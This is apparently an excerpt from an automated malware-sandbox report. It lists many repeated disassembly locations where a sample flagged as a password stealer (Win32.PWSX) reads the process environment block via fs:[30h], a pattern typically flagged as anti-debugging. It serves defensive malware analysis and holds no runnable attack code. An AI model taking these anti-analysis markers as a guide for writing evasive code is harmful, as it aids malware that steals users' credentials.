          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01824A2C mov eax, dword ptr fs:[00000030h]10_2_01824A2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3ACA mov eax, dword ptr fs:[00000030h]10_2_017E3ACA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B236 mov eax, dword ptr fs:[00000030h]10_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5AC0 mov eax, dword ptr fs:[00000030h]10_2_017E5AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5AC0 mov eax, dword ptr fs:[00000030h]10_2_017E5AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5AC0 mov eax, dword ptr fs:[00000030h]10_2_017E5AC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FAAB0 mov eax, dword ptr fs:[00000030h]10_2_017FAAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FAAB0 mov eax, dword ptr fs:[00000030h]10_2_017FAAB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01874257 mov eax, dword ptr fs:[00000030h]10_2_01874257
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1A5F mov eax, dword ptr fs:[00000030h]10_2_018A1A5F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E52A5 mov eax, dword ptr fs:[00000030h]10_2_017E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E52A5 mov eax, dword ptr fs:[00000030h]10_2_017E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E52A5 mov eax, dword ptr fs:[00000030h]10_2_017E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E52A5 mov eax, dword ptr fs:[00000030h]10_2_017E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E52A5 mov eax, dword ptr fs:[00000030h]10_2_017E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E1AA0 mov eax, dword ptr fs:[00000030h]10_2_017E1AA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AEA55 mov eax, dword ptr fs:[00000030h]10_2_018AEA55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189B260 mov eax, dword ptr fs:[00000030h]10_2_0189B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189B260 mov eax, dword ptr fs:[00000030h]10_2_0189B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8A62 mov eax, dword ptr fs:[00000030h]10_2_018B8A62
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01825A69 mov eax, dword ptr fs:[00000030h]10_2_01825A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01825A69 mov eax, dword ptr fs:[00000030h]10_2_01825A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01825A69 mov eax, dword ptr fs:[00000030h]10_2_01825A69
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182927A mov eax, dword ptr fs:[00000030h]10_2_0182927A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812581 mov eax, dword ptr fs:[00000030h]10_2_01812581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812581 mov eax, dword ptr fs:[00000030h]10_2_01812581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812581 mov eax, dword ptr fs:[00000030h]10_2_01812581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01812581 mov eax, dword ptr fs:[00000030h]10_2_01812581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D82 mov eax, dword ptr fs:[00000030h]10_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AB581 mov eax, dword ptr fs:[00000030h]10_2_018AB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AB581 mov eax, dword ptr fs:[00000030h]10_2_018AB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AB581 mov eax, dword ptr fs:[00000030h]10_2_018AB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AB581 mov eax, dword ptr fs:[00000030h]10_2_018AB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181FD9B mov eax, dword ptr fs:[00000030h]10_2_0181FD9B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181FD9B mov eax, dword ptr fs:[00000030h]10_2_0181FD9B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018135A1 mov eax, dword ptr fs:[00000030h]10_2_018135A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018165A0 mov eax, dword ptr fs:[00000030h]10_2_018165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018165A0 mov eax, dword ptr fs:[00000030h]10_2_018165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018165A0 mov eax, dword ptr fs:[00000030h]10_2_018165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B05AC mov eax, dword ptr fs:[00000030h]10_2_018B05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B05AC mov eax, dword ptr fs:[00000030h]10_2_018B05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E354C mov eax, dword ptr fs:[00000030h]10_2_017E354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E354C mov eax, dword ptr fs:[00000030h]10_2_017E354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01811DB5 mov eax, dword ptr fs:[00000030h]10_2_01811DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01811DB5 mov eax, dword ptr fs:[00000030h]10_2_01811DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01811DB5 mov eax, dword ptr fs:[00000030h]10_2_01811DB5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F3D34 mov eax, dword ptr fs:[00000030h]10_2_017F3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EAD30 mov eax, dword ptr fs:[00000030h]10_2_017EAD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov eax, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov eax, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov eax, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov ecx, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov eax, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866DC9 mov eax, dword ptr fs:[00000030h]10_2_01866DC9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189FDD3 mov eax, dword ptr fs:[00000030h]10_2_0189FDD3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AFDE2 mov eax, dword ptr fs:[00000030h]10_2_018AFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AFDE2 mov eax, dword ptr fs:[00000030h]10_2_018AFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AFDE2 mov eax, dword ptr fs:[00000030h]10_2_018AFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AFDE2 mov eax, dword ptr fs:[00000030h]10_2_018AFDE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018195EC mov eax, dword ptr fs:[00000030h]10_2_018195EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01898DF1 mov eax, dword ptr fs:[00000030h]10_2_01898DF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E95F0 mov eax, dword ptr fs:[00000030h]10_2_017E95F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E95F0 mov ecx, dword ptr fs:[00000030h]10_2_017E95F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A3518 mov eax, dword ptr fs:[00000030h]10_2_018A3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A3518 mov eax, dword ptr fs:[00000030h]10_2_018A3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A3518 mov eax, dword ptr fs:[00000030h]10_2_018A3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FD5E0 mov eax, dword ptr fs:[00000030h]10_2_017FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FD5E0 mov eax, dword ptr fs:[00000030h]10_2_017FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F527 mov eax, dword ptr fs:[00000030h]10_2_0181F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F527 mov eax, dword ptr fs:[00000030h]10_2_0181F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F527 mov eax, dword ptr fs:[00000030h]10_2_0181F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0186A537 mov eax, dword ptr fs:[00000030h]10_2_0186A537
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AE539 mov eax, dword ptr fs:[00000030h]10_2_018AE539
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814D3B mov eax, dword ptr fs:[00000030h]10_2_01814D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814D3B mov eax, dword ptr fs:[00000030h]10_2_01814D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01814D3B mov eax, dword ptr fs:[00000030h]10_2_01814D3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8D34 mov eax, dword ptr fs:[00000030h]10_2_018B8D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E15C1 mov eax, dword ptr fs:[00000030h]10_2_017E15C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01823D43 mov eax, dword ptr fs:[00000030h]10_2_01823D43
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01863540 mov eax, dword ptr fs:[00000030h]10_2_01863540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01893D40 mov eax, dword ptr fs:[00000030h]10_2_01893D40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01898D47 mov eax, dword ptr fs:[00000030h]10_2_01898D47
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01807D50 mov eax, dword ptr fs:[00000030h]10_2_01807D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01824D51 mov eax, dword ptr fs:[00000030h]10_2_01824D51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01824D51 mov eax, dword ptr fs:[00000030h]10_2_01824D51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E3591 mov eax, dword ptr fs:[00000030h]10_2_017E3591
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2D8A mov eax, dword ptr fs:[00000030h]10_2_017E2D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2D8A mov eax, dword ptr fs:[00000030h]10_2_017E2D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2D8A mov eax, dword ptr fs:[00000030h]10_2_017E2D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2D8A mov eax, dword ptr fs:[00000030h]10_2_017E2D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2D8A mov eax, dword ptr fs:[00000030h]10_2_017E2D8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01808D76 mov eax, dword ptr fs:[00000030h]10_2_01808D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01808D76 mov eax, dword ptr fs:[00000030h]10_2_01808D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01808D76 mov eax, dword ptr fs:[00000030h]10_2_01808D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01808D76 mov eax, dword ptr fs:[00000030h]10_2_01808D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01808D76 mov eax, dword ptr fs:[00000030h]10_2_01808D76
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180C577 mov eax, dword ptr fs:[00000030h]10_2_0180C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180C577 mov eax, dword ptr fs:[00000030h]10_2_0180C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4496 mov eax, dword ptr fs:[00000030h]10_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181D4B0 mov eax, dword ptr fs:[00000030h]10_2_0181D4B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B9CB3 mov eax, dword ptr fs:[00000030h]10_2_018B9CB3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181CCC0 mov eax, dword ptr fs:[00000030h]10_2_0181CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181CCC0 mov eax, dword ptr fs:[00000030h]10_2_0181CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181CCC0 mov eax, dword ptr fs:[00000030h]10_2_0181CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181CCC0 mov eax, dword ptr fs:[00000030h]10_2_0181CCC0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4439 mov eax, dword ptr fs:[00000030h]10_2_017E4439
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB433 mov eax, dword ptr fs:[00000030h]10_2_017FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB433 mov eax, dword ptr fs:[00000030h]10_2_017FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB433 mov eax, dword ptr fs:[00000030h]10_2_017FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8CD6 mov eax, dword ptr fs:[00000030h]10_2_018B8CD6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A14FB mov eax, dword ptr fs:[00000030h]10_2_018A14FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866CF0 mov eax, dword ptr fs:[00000030h]10_2_01866CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866CF0 mov eax, dword ptr fs:[00000030h]10_2_01866CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866CF0 mov eax, dword ptr fs:[00000030h]10_2_01866CF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B740D mov eax, dword ptr fs:[00000030h]10_2_018B740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B740D mov eax, dword ptr fs:[00000030h]10_2_018B740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B740D mov eax, dword ptr fs:[00000030h]10_2_018B740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
